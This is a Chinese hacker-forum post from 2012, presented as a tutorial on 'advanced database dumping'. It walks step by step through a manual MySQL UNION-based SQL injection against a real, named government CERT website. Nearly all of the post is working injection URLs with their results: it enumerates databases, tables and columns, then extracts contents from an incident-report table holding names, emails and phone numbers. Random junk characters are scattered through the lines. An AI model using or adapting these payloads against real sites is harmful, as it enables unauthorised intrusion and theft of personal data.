找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2218|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询  Y4 h7 m0 ~) }$ [  f
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解# f2 o. {2 G, t: A4 l. @2 f' Z
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--9 J' Y9 {* {  L# h0 |2 ~! o
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
4 b9 R- Q2 W3 c9 p: i1 v- l数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
: \# d  i, n' Y  ~; z1 Q7 R/ q) ]4.判断有没有写权限/ d, R5 x- y3 f; X  u
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
6 d: Y7 v: Z0 {3 Z) j" I) l没办法,手动猜表啦
( \- Y  F9 P- n5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
3 K4 E) h, V4 v+ B但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
4 J7 M. M* V" w3 y/ ?$ o# ^http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
+ N. F" l5 V& Z  @4 ^# }- p成功查出所有数据库,国外的黑客就是不一般。数据库如下:  ~3 t$ F) r% |: ?
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb: d) f* J, T& B+ c
6.爆表,爆的是twcert库
% x, J3 E- B4 h( \) o9 Thttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
; U" `. ^8 h; |$ |. p: ]爆出如下表3 |: a3 L! M: @
downloadfile,irsys,newsdata,secrpt,secrpt_big5+ e# e$ X6 R% _, W4 F/ f
7.爆列名,这次爆的是irsys表) ^" H! L! }) {$ u
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
6 s- A0 W: S. j. P爆出如下列
9 W) G/ I+ @8 I! pir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
6 s; Q1 r7 h* `8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。5 W4 K! S  B6 M5 K" b) l4 |
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--; c- C, v. p$ q& s
返回是3,说明每个列里有3个地段
+ F: f) ~  A  @4 X9.爆字段内容1 n$ Q1 V) s" y+ A1 R  ^
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--0 y; Y2 F) n+ k' Y, y
爆出name列的第一个字段的内容! `- H  y3 [' R
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--  r6 B$ K- [4 C5 K- g6 _
爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表